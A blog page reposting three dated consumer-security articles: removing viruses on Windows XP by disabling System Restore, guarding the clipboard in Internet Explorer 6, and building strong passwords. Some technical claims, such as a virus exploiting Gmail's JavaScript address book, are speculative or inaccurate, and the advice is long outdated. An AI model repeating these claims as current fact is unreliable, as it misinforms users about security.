If you do not have a backup then here is what you must do. Running an antivirus program will hunt down and find the virus. I have found that you will need to run it several times, but what you need to know is that you must turn off system restore (XP users). System restore will SAVE the virus! Please remember that once you disable system restore you will lose all restore points. This is what you want to do. Here is how to do it. Right click on my computer and choose properties. Select the system restore tab and check turn off, it will take a moment but this is normal. Go back to your desktop and run your antivirus. Once you have removed any malware you MUST go back and turn on system restore again. In my opinion system restore is not really a program of much value. When I need it most it won't restore!

 

A quick note here, if you want to backup your system and you need a program you can visit my site. You can also find the free Microsoft backup utility by, (if it was installed) clicking start/ programs/ accessories/ system tools/ backup. If not installed you can add it from your installation disk. It will consume space so only select C (system drive) and unselect everything unnecessary and also select System State.

Good Luck!

Maumee Valley Computer.

Providing software for computer security and optimization that is user friendly and effective. Clean, protect, and optimize your computer to restore peak performance.

http://jmdcomputer.blogspot.com/

Article Source: http://EzineArticles.com/?expert=Alan_Hohenbrink

Never Use Copy Paste and IE6

I used to think taxi cabs or restaurants that use old fashion carbon paper receipts for credit card transactions were the biggest source of credit card debt and fraud.

I was told thieves would go to the dumpster and rummage through the garbage looking for these receipts. The impression on the carbon paper would give the credit card number, and expiration date. This is one reason why they started using the 3 digit CVS code on the back of credit cards.

         

 

However, recently my friend had a virus that sent out a SPAM email to everyone on his Gmail address book!

That got me thinking... unlike Yahoo or Hotmail, Gmail uses JavaScript to store your address book, and the virus exploited that vulnerability.

Sure, you think sending out a harmless email for a penny stock, Viagra, or MLM offer is no big deal. People will recognize it and simply delete it.

Then I thought about other JavaScript and ASP programming exploits?

I know a lot of people keep a special file on their computer with all their passwords or credit card info.

 

These same people use the copy and paste command (CTRL-C and CTRL-V) to enter repetitive strings of text, including credit cards.

Sounds harmless?

The just for fun, type in notepad or WordPad some garbage text, highlight it, then copy it (using right click... copy, simply the keyboard shortcut of CTRL-C).

Or just select the sample text below, and copy it to your clipboard:

My Credit Card number is 1234567890123

This only works in older versions of IE. Newer versions if IE will warn you (hopefully).

Shocking?

There was a movement recently when some popular Norway websites showed banners to Internet Explorer 6 (IE6) browser users advising them to upgrade their web browser to the latest version. They also suggest seeking other alternative browsers and now the campaign is spreading across the world!

There are several good browsers to choose from. My preference is Firefox, with all your favorite extensions. As well, there is Google's Chrome, Apple's Safari, the fast Opera or simply upgrade to Internet Explorer 7 or even try the latest IE8 Beta.

Here's how to protect your data in Windows Clipboard and Internet Explorer:

  • Open Internet Explorer.
  • Go to the menu, Tools > Internet Options > Security.
  • Under the Security tab, click the Custom Level button.
  • In the Security Settings window, find the message that is "Allow Paste Operations via Script". Under this message, select Disable and then click OK.
  • In the Security Settings window, find the message that is "Programmatic clipboard access". Under this message, select Disable and then click OK.

I hope the above message will shed some light on credit card fraud!

Own Home Style.com gives advice on home improvement, home interior design, home loans & mortgages. Sign up for the OwnHomestyle.com newsletter and receive 8 free eBooks on Home Improvement, Garden Tips, Energy Saving Tips, and Tips on Selling your Home.

Article Source: http://EzineArticles.com/?expert=Lauren_Rose

Why You Need to Create and Protect Strong Email Passwords

It is important for several reasons to have a strong password on your e-mail and web site accounts. Your email account is the gateway into your personal information including web banking, investment accounts, and other websites that store your personal information online. There is also a growing trend of spammers breaking into e-mail accounts with weak passwords and using them to send massive amounts of spam which can lead to your ISP closing your e-mail account before you even realize that there is a problem.

   

The following are examples of weak passwords that must be avoided:

  • temp
  • password
  • change me
  • having the same username and password
  • sequences such as abcd, 1234, and abc123.
  • the last 4 digits of your social security number
  • your birthday or the birthday of someone close to you

To create a strong password please use a combination of the following guidelines:

  • Mix capital and lowercase letters, numbers, and use punctuation.
  • Create passwords that are over 8 characters long.
  • Use the first letters from a phrase or sentence that you can remember.
  • Substitute numbers, misspellings, and punctuation into phrase and sentence based passwords.

Now we will use the above recommendations to create a new strong password.

 

An example phrase is "Talk to the hand because the face ain't listening".

-Use all of the first letters: ttthbtfal
-Then capitalize every other letter: TtThBtFaL
-Substitute in some numbers: T2ThBtF8L
-Add some punctuation and generate our new strong password: T2T&btF8L!

Now that you have a strong password you need to protect it!

Lastly, I recently learned a great tip about reminder questions and how to protect your passwords.

Lie! When you are asked by a site that you trust to provide your mothers maiden name, name of first pet, fathers first job, the city you grew up in, or your zip code, do not give an honest answer. Create a fake history for yourself with funny answers that are untruthful but you will be easily able to remember when asked the questions. It is possible for a lot to be learned about some people by reading the information they have posted in casual conversations, e-mail threads, chats, and internet forums.

Article Source: http://EzineArticles.com/?expert=Raymond_Popowich

 
Design and Bloggerized by JMD Computer